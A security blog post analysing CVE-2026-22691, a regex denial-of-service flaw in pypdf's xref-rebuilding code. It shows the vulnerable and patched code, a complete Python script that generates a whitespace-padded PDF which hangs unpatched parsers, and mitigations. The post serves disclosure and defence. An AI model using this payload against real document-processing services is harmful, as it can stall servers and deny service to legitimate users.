CVE-2026-22691

The White Void: Choking pypdf with Nothingness

Alon Barad
Alon Barad
Software Engineer

Jan 11, 2026ยท6 min read

Executive Summary (TL;DR)

pypdf tries too hard to be helpful. When it encounters a broken PDF index (xref), it scans the file to rebuild it. Prior to version 6.6.0, this scan used a regex that chokes on massive blocks of whitespace. An attacker can craft a 'broken' PDF with megabytes of empty space, causing the parser to hang indefinitely and consume 100% CPU.

A Denial of Service vulnerability in the pypdf library allows attackers to exhaust CPU resources by supplying malformed PDF files containing excessive whitespace. This occurs during the library's attempt to rebuild damaged cross-reference tables using inefficient regular expressions.

The Hook: When "Fixing It" Goes Wrong

PDFs are fragile beasts. Internally, they rely on a Cross-Reference Table (xref) acts as a map, telling the reader exactly where byte-offset each object (images, text blocks, fonts) lives in the file. If this map is corrupted or missing, a strict PDF reader will usually just throw an error and give up.

But pypdf is not a quitter. In its default "non-strict" mode, it attempts to be the hero. If the startxref pointer is garbage, pypdf enters a recovery mode called _rebuild_xref_table. It rolls up its sleeves and decides to read the entire raw file, byte by byte, to find the objects itself and reconstruct the map.

Here lies the tragedy: the mechanism it used to scan for these objects was naively optimistic. It assumed that the space between objects would be reasonable. It didn't account for a malicious actor handing it a file that is 99% empty void and 1% content. This vulnerability is the classic tale of a fallback mechanism becoming the primary attack vector.

The Flaw: Death by Regular Expression

The root cause isn't memory corruption or a buffer overflow; it's algorithmic complexity, specifically a variant of ReDoS (Regular Expression Denial of Service). When pypdf attempts to find objects in the raw stream, it previously used Python's re module.

Here is the culprit regex that was running the show:

re.finditer(rb"[\r\n \t][ \t]*(\d+)[ \t]+(\d+)[ \t]+obj", f_)

Let's break down why this is dangerous. The regex looks for whitespace ([\r\n \t]), followed by optional whitespace ([ \t]*), followed by digits (the Object ID), more whitespace, digits (Generation ID), and finally the keyword obj.

If you feed the parser a file where an object ID is preceded by 50MB of spaces and tabs, the regex engine has to chew through all of that. While Python's re module is generally fast, the overhead of matching massive variable-length whitespace buffers against complex patterns repeatedly creates a linear (or worse, depending on the engine's backtracking) performance cliff. The CPU spins at 100%, attempting to tokenize millions of void characters looking for a pattern that might not even be there.

The Code: The Smoking Gun

The fix provided by the maintainers in commit 294165726b646bb7799be1cc787f593f2fdbcf45 is a masterclass in "stop using regex for parsing binary formats."

The Vulnerable Code (Before):

The library relied on re.finditer to locate every instance of the obj definition. This is elegant to write but expensive to execute on untrusted input.

# old code inside _rebuild_xref_table
for match in re.finditer(rb"[\r\n \t][ \t]*(\d+)[ \t]+(\d+)[ \t]+obj", data):
    # ... logic to process match ...

The Fixed Code (After):

The patch completely rips out the regex engine. Instead, it implements a manual byte scanner _find_pdf_objects. It searches specifically for the bytes b" obj" using the highly optimized data.find() method (which uses Boyer-Moore or similar fast string search algorithms in C), and then manually walks backward to verify the digits.

# new approach in version 6.6.0
while True:
    # Fast C-level search for the keyword
    i = data.find(b" obj", i + 1)
    if i == -1:
        break
    
    # Manual backward scanning to find the Object ID and Generation ID
    # This avoids the overhead of the regex state machine entirely
    # ... logic to parse digits backwards ...

This change shifts the complexity from the regex engine's opaque handling of whitespace to a strictly linear scan that skips whitespace efficiently.

The Exploit: Constructing the Void

To exploit this, we don't need shellcode. We just need a text editor (or a Python script) and a lot of space bar hits. The goal is to force pypdf into the _rebuild_xref_table method and then trap it there.

The Recipe:

  1. Valid Header: Start with %PDF-1.4 so the library recognizes it.
  2. The Payload: Insert a valid object, but precede it with 10MB (or more) of spaces, tabs, and newlines.
  3. The Trigger: Corrupt the startxref at the end of the file. This tells pypdf: "Hey, the map is broken, please scan the file manually."
# Concept PoC Generator
header = b"%PDF-1.4\n"
# The trap: Massive whitespace before a valid object definition
payload = b" " * (1024 * 1024 * 50) + b"1 0 obj\n<< >>\nendobj\n"
# Corrupt EOF to trigger rebuild
trailer = b"\ntrailer\n<< /Root 1 0 R >>\nstartxref\n0\n%%EOF"
 
with open("dos.pdf", "wb") as f:
    f.write(header + payload + trailer)

When a vulnerable pypdf (default mode) opens this file, it sees the bad startxref, sighs, and starts scanning. It hits the 50MB wall of whitespace. Because of the regex inefficiencies, the process will hang, potentially for minutes or longer depending on the file size, causing a Denial of Service.

The Impact: Why Low CVSS is Deceptive

The CVSS score is 2.7 (Low). Do not let this fool you. CVSS scores often underestimate the impact of DoS in modern cloud architectures.

Imagine you have a document processing pipeline running on AWS Lambda or a Celery worker. A user uploads invoice.pdf (which is actually our dos.pdf).

  1. The Worker Stalls: The Python process hits 100% CPU and stays there.
  2. The Timeout: If you have a timeout of 30 seconds, the worker dies. If you don't (and many poorly configured containers don't), it runs until the heat death of the universe or your credit card limit.
  3. Thread Exhaustion: If this is a synchronous web server (like Gunicorn with sync workers), a few requests can tie up all available workers, rendering the entire application unresponsive to legitimate traffic.

This is a low-complexity, high-annoyance attack that effectively shuts down PDF ingestion pipelines.

The Mitigation: Hard Limits and Updates

The primary fix is straightforward: Update pypdf to version 6.6.0 or later. The shift from regex to manual parsing eliminates the performance cliff.

However, there are architectural mitigations you should apply regardless of the version:

  1. Strict Mode: If you control the input and expect valid PDFs, turn off the heroics. Initialize the reader with PdfReader(stream, strict=True). This disables the automatic repair functionality entirely. If the PDF is broken, it raises an exception immediately rather than trying to fix it and dying in the process.

  2. Resource Limits: The patch also introduced root_object_recovery_limit. Even with the fix, you should limit how much effort the parser spends trying to recover broken files.

  3. Timeouts: Never process file uploads without a hard timeout wrapper around the processing function. Assume every PDF is a bomb.

Fix Analysis (1)

Technical Appendix

CVSS Score
2.7/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
EPSS Probability
0.04%
Top 100% most exploited

Affected Systems

pypdf < 6.6.0

Affected Versions Detail

Product
Affected Versions
Fixed Version
pypdf
py-pdf
< 6.6.06.6.0
AttributeDetail
CWE IDCWE-1333 (ReDoS)
Attack VectorNetwork (File Upload)
CVSS v4.02.7 (Low)
ImpactDenial of Service (DoS)
EPSS Score0.00042 (Low Probability)
Vulnerable ComponentPdfReader._rebuild_xref_table
CWE-1333
ReDoS

Inefficient Regular Expression Complexity

Vulnerability Timeline

Vendor releases fix in version 6.6.0
2026-01-09
CVE-2026-22691 published
2026-01-10
GHSA-4f6g-68pf-7vhv published
2026-01-10

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.